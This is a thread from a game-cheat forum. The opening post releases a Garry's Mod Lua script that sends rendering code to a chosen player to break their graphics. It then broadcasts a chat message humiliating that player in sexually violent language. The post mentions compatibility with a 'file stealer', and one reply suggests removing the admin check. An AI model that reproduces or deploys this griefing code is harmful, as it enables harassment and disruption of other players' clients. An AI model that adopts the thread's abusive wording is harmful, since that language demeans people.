Results 1 to 7 of 7
  1. #1
    TheyCallMeASkid's Avatar
    Join Date
    Jan 2015
    Gender
    male
    Posts
    0
    Reputation
    10
    Thanks
    1
    My Mood
    Cool

    Post Render Exploit - A serverside exploit (Compatible with ehex's file stealer!)

    Load this serverside and you have funny exploits.
    Credit only goes to me.

    File stealer credit goes to:
    Willox - Making
    ehex - Releasing


     
    Code:
    // 
    // Exploit exploited by TheyCallMeASkid and all who decide to make use of this.
    // Syntax: sv_breakclientgraphics "steamid_or_name" numIterations
    
    local consoleStartupMessage = [[
    Initializing render.AddBeam exploit script - By TheyCallMeASkid
    	Console Command Syntax: sv_breakclientgraphics "steamid_or_name" numIterations
    	The more iterations performed, the more messed up the victim's graphics will be.
    	Be sure you have the steamid/name in quotes, otherwise this won't work!
    Have fun breaking people's graphics!
    ]]
    
    hook.Add("PlayerInitialSpawn", "breakClientGraphicsInit", function(ply)
    	if ply:IsAdmin() then
    		Msg(consoleStartupMessage)
    	end
    end)
    
    function BreakClientsGraphics(ply, cmd, args)
    	
    	if !ply:IsAdmin() then return end
    	
    	local victim = NULL
    	local rep = tonumber(args[2])
    	
    	if !rep or rep == 0 then
    		rep = 1
    	end
    	
    	for k, v in pairs(player.GetAll()) do
    		if v:SteamID() == args[1] then
    			victim = v
    			print("Viictim found by Steam ID: "..tostring(victim))
    			break
    		end
    		if string.find(v:Nick(), args[1]) then
    			victim = v
    			print("Victim found by Name: "..tostring(victim))
    			break
    		end
    	end
    	
    	if victim:IsValid() and victim:IsPlayer() then
    		
    		local breakCode1 = [[
    			render.StartBeam(100)
    				for i = 1, ]]
    		local breakCode2 = [[ do
    					render.AddBeam(
    						nil,
    						32,
    						CurTime() + 1,
    						color_white
    					)
    				end
    			render.EndBeam()
    		]]
    		
    		local noteCode1 = [[
    			chat.AddText(
    				Color(255,255,255), "Mingebag ",
    				Color(255,0,0), "]]
    		local noteCode2 = [[",
    				Color(255,255,255), " graphics were raped by a ",
    				Color(30,30,200), "Server Administrator."
    			)
    			chat.PlaySound()
    		]]
    		
    		ply:ChatPrint("Sending code to "..victim:Nick().." with a power of "..rep.." repeat"..(rep > 1 and "s").."!")
    		
    		for k, v in pairs(player.GetAll()) do
    			v:SendLua( noteCode1..victim:Nick().."'s"..noteCode2 )
    		end
    		
    		victim:SendLua( breakCode1	.. rep .. breakCode2 )
    		
    	else
    		
    		ply:ChatPrint("The player you entered was not a valid player")
    		
    	end
    	
    end
    concommand.Add("sv_breakclientgraphics", BreakClientsGraphics)

    pastebin. com/ nmNgdW4f (Remove spaces, I cannot post links)
    Last edited by TheyCallMeASkid; 01-06-2015 at 07:03 PM.

  2. #2
    MeepDarknessMeep's Avatar
    Join Date
    Aug 2012
    Gender
    female
    Posts
    725
    Reputation
    22
    Thanks
    922
    complete shit

  3. The Following User Says Thank You to MeepDarknessMeep For This Useful Post:

    tdsx (01-06-2015)

  4. #3
    GerldE's Avatar
    Join Date
    Sep 2014
    Gender
    male
    Posts
    3
    Reputation
    10
    Thanks
    1
    Shit don't work gayboy.

  5. #4
    D3M0L1T10N's Avatar
    Join Date
    May 2012
    Gender
    male
    Posts
    1,364
    Reputation
    19
    Thanks
    656
    how is this an exploit

  6. #5
    Redfiend's Avatar
    Join Date
    Mar 2013
    Gender
    male
    Posts
    9
    Reputation
    10
    Thanks
    0
    My Mood
    Bored
    Nice code, it seems to work from my end. MPGH, this is admin only, try removing "if ply:IsAdmin() return end"

  7. #6
    D3M0L1T10N's Avatar
    Join Date
    May 2012
    Gender
    male
    Posts
    1,364
    Reputation
    19
    Thanks
    656
    Quote Originally Posted by Redfiend View Post
    Nice code, it seems to work from my end. MPGH, this is admin only, try removing "if ply:IsAdmin() return end"
    ahahahahaha

  8. #7
    max1612's Avatar
    Join Date
    Feb 2013
    Gender
    male
    Location
    C:/Users
    Posts
    532
    Reputation
    18
    Thanks
    1,466
    why do we need admin only exploits if you are an admin you can just booze
    Empty for now

  9. The Following User Says Thank You to max1612 For This Useful Post:

    MeepDarknessMeep (01-07-2015)

Similar Threads

  1. [Release] [Leached] _Say_'s COMPLETE mod (ver 1.1) (fully compatible with 0.6.6 game patch)
    By EzHaCker in forum World of Tanks Hacks & Cheats
    Replies: 11
    Last Post: 01-16-2012, 10:59 PM
  2. [Request] X-Ray compatible with buildcraft/industrialcraft
    By MrInsanity in forum Minecraft Help
    Replies: 11
    Last Post: 11-17-2011, 10:16 PM
  3. [Solved] Is this compatible with windows xp :o?
    By Brownie in forum Call of Duty Modern Warfare 2 Help
    Replies: 2
    Last Post: 10-12-2011, 07:40 AM
  4. [Release] decafCoffee by atillathedud (Compatible with v1.7!)
    By matjuh123 in forum Call of Duty 4 - Modern Warfare (MW) Hacks
    Replies: 37
    Last Post: 12-10-2010, 04:24 AM
  5. [SOLVED] how i can host a public server compatible with alteriwnet 1.3.37a???
    By hamed2011 in forum Call of Duty Modern Warfare 2 Help
    Replies: 4
    Last Post: 08-15-2010, 05:09 AM